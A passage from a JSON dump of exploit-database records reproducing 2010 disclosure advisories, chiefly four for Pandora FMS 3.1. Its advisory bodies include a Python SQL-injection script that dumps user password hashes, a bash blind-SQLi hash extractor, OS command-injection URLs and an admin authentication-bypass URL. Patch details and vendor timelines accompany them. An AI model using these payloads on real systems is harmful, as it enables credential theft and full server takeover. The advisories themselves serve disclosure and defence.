user can manipulate this value\nin order to execute code in the database layer of the application.\n\n\n8. *Report Timeline*\n\n. 2010-11-29:\nCore Security Technologies notifies the BugTracker team of the\nvulnerability, setting the estimated publication date of the advisory to\nDecember 20th 2010.\n\n. 2010-11-29:\nThe BugTracker team asks Core for a technical description of the\nvulnerability.\n\n. 2010-11-29:\nTechnical details sent to BugTracker team.\n\n. 2010-11-29:\nThe BugTracker team acknowledges the report and notifies they will fix\nall issues in 1 or 2 working days.\n\n. 2010-11-30:\nThe BugTracker team notifies that a patched version is publicly\navailable at Sourceforge and Codeplex.\n\n. 2010-11-30:\nThe advisory CORE-2010-1109 is published.\n\n\n9. *References*\n\n[1] BugTracker.NET official website:\n[http://ifdefined.com/bugtrackernet.html].\n[2] BugTracker.NET Source Forge project:\n[http://sourceforge.net/projects/btnet/].\n\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\n[http://corelabs.coresecurity.com].\n\n\n11. *About Core Security Technologies*\n\nCore Security Technologies develops strategic solutions that help\nsecurity-conscious organizations worldwide develop and maintain a\nproactive process for securing their networks. The company's flagship\nproduct, CORE IMPACT, is the most comprehensive product for performing\nenterprise security assurance testing. CORE IMPACT evaluates network,\nendpoint and end-user vulnerabilities and identifies what resources are\nexposed. It enables organizations to determine if current security\ninvestments are detecting and preventing attacks. Core Security\nTechnologies augments its leading technology solution with world-class\nsecurity consulting services, including penetration testing and software\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\n[http://www.coresecurity.com].\n\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2010 Core Security\nTechnologies and (c) 2010 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]\n\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\n[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:42", "description": "\nPandora Fms 3.1 - SQL Injection", "edition": 2, "published": "2010-11-30T00:00:00", "title": "Pandora Fms 3.1 - SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4280"], "modified": "2010-11-30T00:00:00", "id": "EXPLOITPACK:F76D7386F0D2CD3AC198A2742E1CE4A3", "href": "", "sourceData": "[+] Introduction\n\nPandora FMS (for Pandora Flexible Monitoring System) is a software\nsolution for monitoring computer networks. It allows monitoring in a\nvisual way the status and performance of several parameters from\ndifferent operating systems, servers, applications and hardware systems\nsuch as firewalls, proxies, databases, web servers or routers.\n\nIt can be deployed in almost any operating system. It features remote\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\nagents. An agent is available for each platform. It can also monitor\nhardware systems with a TCP/IP stack, such as load balancers, routers,\nnetwork switches, printers or firewalls.\n\nThis software has several servers that process and get information from\ndifferent sources, using WMI for gathering remote Windows information, a\npredictive server, a plug-in server which makes complex user-defined\nnetwork tests, an advanced export server to replicate data between\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\nTrap console.\n\nReleased under the terms of the GNU General Public License, Pandora FMS\nis free software.\n\n3) SQL Injection - CVE-2010-4280 - CVSS 8.5/10\n\nThe parameter id_group when get_agents_group_json is equal to 1 is\nvulnerable to SQL Injection attacks.\n\nPoC:\nhttp://host/pandora_console/ajax.php?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario\n\n\nExploit:\n\n# Pandora Flexible Monitoring System SQL Injection PoC\n# Juan Galiana Lara\n# Gets the list of users and password from the database\n#\n#configure cookie&host before use it\n#usage\n#python sqlinj_users.py\n#admin:75b756ff2785ea8bb9ae02c13b6a71f1\n#...\n\nimport json\nimport urllib2\n\nheaders = {\"Cookie\": \"PHPSESSID=a4s3nf1tqv2fau8s6qhi6rutp9dahe9o\"}\n\nurl = \"http://HOST/pandora_console/ajax.php\";\nurl+=\n\"?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1\"\nurl+=\n\"/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario\"\n\nreq = urllib2.Request(url,headers=headers)\nresp = urllib2.urlopen(req)\n\nusers = json.read(resp.read())\nfor user in users:\n print(user[\"id_agente\"]+\":\"+user[\"nombre\"])\n\n\nThe fix to these kind of issues was the implementation of a generic\nfilter against sql injection. A proper fix is planned for a major version.\n\n\n[+] Impact\n\nAn attacker can execute commands of the operating system, inject remote\ncode in the context of the application, get arbitrary files from the\nfilesystem or extract any data of the database including passwords and\nconfidential information about the monitored network/systems. Also it is\npossible to bypass the authentication or scale privileges to became\nadmin, gaining full control of the web application and web server. These\nvulnerabilities have a high impact to the confidentiality, integrity,\nand availability of the system.\n\n\n[+] Systems affected\n\nVersions prior and including 3.1 of Pandora FMS are affected\n\n\n[+] Solution\n\nApply the security fix for version 3.1:\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\n\n\nOr upgrade to version 3.1.1 from\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\n\n\n[+] Timeline\n\nAgo 2010: First contact to vendor\nAgo 2010: Confirmation of vendor\nSept 2010: Second contact: SQL Injection vulnerabilities\nSept 2010: Confirmation that the fix will be released on October\nOct 2010: PandoraFMS security patch for 3.1 version released\nOct 2010: Request for CVE numbers\nNov 2010: PandoraFMS version 3.1.1 released\nNov 2010: Disclosure of this advisory\n\n\n[+] References\n\nOfficial PandoraFMS site: http://pandorafms.org/\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\n\n\n[+] Credits\n\nThese vulnerabilities has been discovered by Juan Galiana Lara -\n@jgaliana - http://juangaliana.blogspot.com/\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (GNU/Linux)\n\niQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy\nYbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s\nIVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9\nWIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4\ncC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP\nJPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP\n8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4\n7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH\npARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5\nyNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4\noBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF\nsn9vRJk4gc/PozOXDjC3\n=WmOh\n-----END PGP SIGNATURE-----", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:42", "description": "\nPandora Fms 3.1 - Blind SQL Injection", "edition": 2, "published": "2010-11-30T00:00:00", "title": "Pandora Fms 3.1 - Blind SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4280"], "modified": "2010-11-30T00:00:00", "id": "EXPLOITPACK:DCDCA68A8D7F072D769CB6491CA7B34E", "href": "", "sourceData": "[+] Introduction\n\nPandora FMS (for Pandora Flexible Monitoring System) is a software\nsolution for monitoring computer networks. It allows monitoring in a\nvisual way the status and performance of several parameters from\ndifferent operating systems, servers, applications and hardware systems\nsuch as firewalls, proxies, databases, web servers or routers.\n\nIt can be deployed in almost any operating system. It features remote\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\nagents. An agent is available for each platform. It can also monitor\nhardware systems with a TCP/IP stack, such as load balancers, routers,\nnetwork switches, printers or firewalls.\n\nThis software has several servers that process and get information from\ndifferent sources, using WMI for gathering remote Windows information, a\npredictive server, a plug-in server which makes complex user-defined\nnetwork tests, an advanced export server to replicate data between\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\nTrap console.\n\nReleased under the terms of the GNU General Public License, Pandora FMS\nis free software.\n\n4) Blind SQL Injection - CVE-2010-4280 - CVSS: 8.5/10\n\nThe parameter group_id of operation/agentes/estado_agente.php is\nvulnerable to blind sql injection.\n\n\nPoC:\nhttp://host/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=24%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=49%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281\n\n\nExploit:\n\n#!/bin/bash\n# Pandora Flexible Monitoring System Blind SQL Injection PoC\n# Juan Galiana Lara\n# Gets the md5 hash password from a specific user\n#\n#configure host,cookie&group_id before use it\n#usage\n#$ ./getpassword.sh\n#74b444ff2785ea8bb9ae02c13b6a71f1\n\nHOST=\"HOST\"\nTARGET_USER=\"0x61646d696e\" #admin\nPATTERN=\"Interval\"\nCOOKIE=\"rq842tci6e5ib7t918c6sv1ml4\"\nCHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v\nw x y z)\nGROUP_ID=2\n\nj=1\nwhile [[ $j -lt 33 ]]; do\n i=0\n while [[ $i -lt ${#CHARSET[ () ]} ]]; do\n c=$(printf '%d' \"'${CHARSET[$i]}\")\n\nURL=\"http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281\";;\n curl $URL --cookie \"PHPSESSID=$COOKIE\" 2> /dev/null | grep -q\n$PATTERN;\n if [ $? -eq 0 ]; then echo -n ${CHARSET[$i]}; break; fi;\n let i++\n done;\n if [[ $i -eq ${#CHARSET[ () ]} ]]; then echo \"Something went wrong!\";\nexit 1; fi\n let j++;\ndone\necho\nexit 0\n\n\nThe fix to these kind of issues was the implementation of a generic\nfilter against sql injection. A proper fix is planned for a major version.\n\n\n[+] Impact\n\nAn attacker can execute commands of the operating system, inject remote\ncode in the context of the application, get arbitrary files from the\nfilesystem or extract any data of the database including passwords and\nconfidential information about the monitored network/systems. Also it is\npossible to bypass the authentication or scale privileges to became\nadmin, gaining full control of the web application and web server. These\nvulnerabilities have a high impact to the confidentiality, integrity,\nand availability of the system.\n\n\n[+] Systems affected\n\nVersions prior and including 3.1 of Pandora FMS are affected\n\n\n[+] Solution\n\nApply the security fix for version 3.1:\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\n\n\nOr upgrade to version 3.1.1 from\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\n\n\n[+] Timeline\n\nAgo 2010: First contact to vendor\nAgo 2010: Confirmation of vendor\nSept 2010: Second contact: SQL Injection vulnerabilities\nSept 2010: Confirmation that the fix will be released on October\nOct 2010: PandoraFMS security patch for 3.1 version released\nOct 2010: Request for CVE numbers\nNov 2010: PandoraFMS version 3.1.1 released\nNov 2010: Disclosure of this advisory\n\n\n[+] References\n\nOfficial PandoraFMS site: http://pandorafms.org/\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\n\n\n[+] Credits\n\nThese vulnerabilities has been discovered by Juan Galiana Lara -\n@jgaliana - http://juangaliana.blogspot.com/\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (GNU/Linux)\n\niQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy\nYbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s\nIVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9\nWIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4\ncC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP\nJPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP\n8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4\n7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH\npARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5\nyNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4\noBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF\nsn9vRJk4gc/PozOXDjC3\n=WmOh\n-----END PGP SIGNATURE-----", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:42", "description": "\nPandora Fms 3.1 - OS Command Injection", "edition": 2, "published": "2010-11-30T00:00:00", "title": "Pandora Fms 3.1 - OS Command Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4278"], "modified": "2010-11-30T00:00:00", "id": "EXPLOITPACK:79EE56BF02CD5BA93DC282D5F692C3FF", "href": "", "sourceData": "[+] Introduction\n\nPandora FMS (for Pandora Flexible Monitoring System) is a software\nsolution for monitoring computer networks. It allows monitoring in a\nvisual way the status and performance of several parameters from\ndifferent operating systems, servers, applications and hardware systems\nsuch as firewalls, proxies, databases, web servers or routers.\n\nIt can be deployed in almost any operating system. It features remote\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\nagents. An agent is available for each platform. It can also monitor\nhardware systems with a TCP/IP stack, such as load balancers, routers,\nnetwork switches, printers or firewalls.\n\nThis software has several servers that process and get information from\ndifferent sources, using WMI for gathering remote Windows information, a\npredictive server, a plug-in server which makes complex user-defined\nnetwork tests, an advanced export server to replicate data between\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\nTrap console.\n\nReleased under the terms of the GNU General Public License, Pandora FMS\nis free software.\n\n2) OS Command Injection - CVE-2010-4278 - CVSS 9/10\n\nThe layout parameter in file operation/agentes/networkmap.php is not\nproperly filtered and allows an attacker to inject OS commands.\n\nSnippet of vulnerable code (file operation/agentes/networkmap.php):\n\n32 $layout = (string) get_parameter ('layout', 'radial');\n...\n137 $filename_map = $config[\"attachment_store\"].\"/networkmap_\".$layout;\n138 $filename_img = \"attachment/networkmap_\".$layout.\"_\".$font_size;\n139 $filename_dot = $config[\"attachment_store\"].\"/networkmap_\".$layout;\n...\n162 $cmd = \"$filter -Tcmapx -o\".$filename_map.\" -Tpng\n- -o\".$filename_img.\" \".$filename_dot;\n163 $result = system ($cmd);\n\nPoC:\n\nhttp://servername/pandora_console/index.php?login=1&login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;uname%20-a;\nhttp://servername/pandora_console/index.php?login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;id;\n\nIf we use vulnerability #1 (that permits bypass the authentication\nsystem and login as admin) with this issue, the CVSS will be 10/10.\n\n\n[+] Impact\n\nAn attacker can execute commands of the operating system, inject remote\ncode in the context of the application, get arbitrary files from the\nfilesystem or extract any data of the database including passwords and\nconfidential information about the monitored network/systems. Also it is\npossible to bypass the authentication or scale privileges to became\nadmin, gaining full control of the web application and web server. These\nvulnerabilities have a high impact to the confidentiality, integrity,\nand availability of the system.\n\n\n[+] Systems affected\n\nVersions prior and including 3.1 of Pandora FMS are affected\n\n\n[+] Solution\n\nApply the security fix for version 3.1:\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\n\n\nOr upgrade to version 3.1.1 from\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\n\n\n[+] Timeline\n\nAgo 2010: First contact to vendor\nAgo 2010: Confirmation of vendor\nSept 2010: Second contact: SQL Injection vulnerabilities\nSept 2010: Confirmation that the fix will be released on October\nOct 2010: PandoraFMS security patch for 3.1 version released\nOct 2010: Request for CVE numbers\nNov 2010: PandoraFMS version 3.1.1 released\nNov 2010: Disclosure of this advisory\n\n\n[+] References\n\nOfficial PandoraFMS site: http://pandorafms.org/\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\n\n\n[+] Credits\n\nThese vulnerabilities has been discovered by Juan Galiana Lara -\n@jgaliana - http://juangaliana.blogspot.com/\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (GNU/Linux)\n\niQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy\nYbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s\nIVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9\nWIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4\ncC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP\nJPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP\n8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4\n7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH\npARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5\nyNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4\noBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF\nsn9vRJk4gc/PozOXDjC3\n=WmOh\n-----END PGP SIGNATURE-----", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:42", "description": "\nPandora FMS 3.1 - Authentication Bypass", "edition": 2, "cvss3": {}, "published": "2010-11-30T00:00:00", "title": "Pandora FMS 3.1 - Authentication Bypass", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4279"], "modified": "2010-11-30T00:00:00", "id": "EXPLOITPACK:AC313D70A27F793BE0833F2158F09EED", "href": "", "sourceData": "[+] Introduction\n\nPandora FMS (for Pandora Flexible Monitoring System) is a software\nsolution for monitoring computer networks. It allows monitoring in a\nvisual way the status and performance of several parameters from\ndifferent operating systems, servers, applications and hardware systems\nsuch as firewalls, proxies, databases, web servers or routers.\n\nIt can be deployed in almost any operating system. It features remote\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\nagents. An agent is available for each platform. It can also monitor\nhardware systems with a TCP/IP stack, such as load balancers, routers,\nnetwork switches, printers or firewalls.\n\nThis software has several servers that process and get information from\ndifferent sources, using WMI for gathering remote Windows information, a\npredictive server, a plug-in server which makes complex user-defined\nnetwork tests, an advanced export server to replicate data between\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\nTrap console.\n\nReleased under the terms of the GNU General Public License, Pandora FMS\nis free software.\n\n\n[+] Description and Proof of Concept\n\n\n1) Authentication bypass - CVE-2010-4279 - CVSS: 10/10\n\nAn attacker could access to any account user, including admin, using the\n\"hash login\" authentication process. This kind of authentication method\nworks providing a username and a hash. The issue could be exploited\nremotely providing a username and the md5 of it when\n$config['loginhash_pwd'] is empty, that in fact is the default\nconfiguration.\n\nSnippet of vulnerable code in index.php:\n\n136 // Hash login process\n137 if (! isset ($config['id_user']) && isset ($_GET[\"loginhash\"])) {\n138 $loginhash_data = get_parameter(\"loginhash_data\", \"\");\n139 $loginhash_user = get_parameter(\"loginhash_user\", \"\");\n140\n141 if ($loginhash_data ==\nmd5($loginhash_user.$config[\"loginhash_pwd\"])) {\n142 logon_db ($loginhash_user, $_SERVER['REMOTE_ADDR']);\n143 $_SESSION['id_usuario'] = $loginhash_user;\n144 $config[\"id_user\"] = $loginhash_user;\n\n\n\nProof of concept:\n\nhttp://servername/pandora_console/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1\n\nGot it! admin! :)\n\nBy default, any installation of this software allows unauthenticated\nattackers to perform an authentication bypass and a privilege escalation\nto admin.\n\n\n1.1) Additionally, a manual modification in order to use the hash_hmac\nfunction instead of the weak statement md5 ( $string . $KEY) is\nencouraged for security purposes.\n\nSnippet of code (index.php, version 3.1.1):\n\n145 // Hash login process\n(...)\n150 if ($config[\"loginhash_pwd\"] != \"\" && $loginhash_data ==\nmd5($loginhash_user.$config[\"loginhash_pwd\"])) {\n\nIn line 150, use\nhash_hmac(\"sha256\",$loginhash_user,$config[\"loginhash_pwd\"]), instead of\nmd5($lioginhash_user.$config[\"loginhash_pwd\"])\n\n\n[+] Impact\n\nAn attacker can execute commands of the operating system, inject remote\ncode in the context of the application, get arbitrary files from the\nfilesystem or extract any data of the database including passwords and\nconfidential information about the monitored network/systems. Also it is\npossible to bypass the authentication or scale privileges to became\nadmin, gaining full control of the web application and web server. These\nvulnerabilities have a high impact to the confidentiality, integrity,\nand availability of the system.\n\n\n[+] Systems affected\n\nVersions prior and including 3.1 of Pandora FMS are affected\n\n\n[+] Solution\n\nApply the security fix for version 3.1:\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\n\n\nOr upgrade to version 3.1.1 from\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\n\n\n[+] Timeline\n\nAgo 2010: First contact to vendor\nAgo 2010: Confirmation of vendor\nSept 2010: Second contact: SQL Injection vulnerabilities\nSept 2010: Confirmation that the fix will be released on October\nOct 2010: PandoraFMS security patch for 3.1 version released\nOct 2010: Request for CVE numbers\nNov 2010: PandoraFMS version 3.1.1 released\nNov 2010: Disclosure of this advisory\n\n\n[+] References\n\nOfficial PandoraFMS site: http://pandorafms.org/\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\n\n\n[+] Credits\n\nThese vulnerabilities has been discovered by Juan Galiana Lara -\n@jgaliana - http://juangaliana.blogspot.com/\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (GNU/Linux)\n\niQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy\nYbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s\nIVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9\nWIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4\ncC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP\nJPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP\n8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4\n7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH\npARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5\nyNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4\noBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF\nsn9vRJk4gc/PozOXDjC3\n=WmOh\n-----END PGP SIGNATURE-----", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:03", "description": "\nApache Archiva 1.0 1.3.1 - Cross-Site Request Forgery", "edition": 2, "published": "2010-12-09T00:00:00", "title": "Apache Archiva 1.0 1.3.1 - Cross-Site Request Forgery", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3449"], "modified": "2010-12-09T00:00:00", "id": "EXPLOITPACK:9B1C6B2B80B160E09AA3AB7E39A498B1", "href": "", "sourceData": 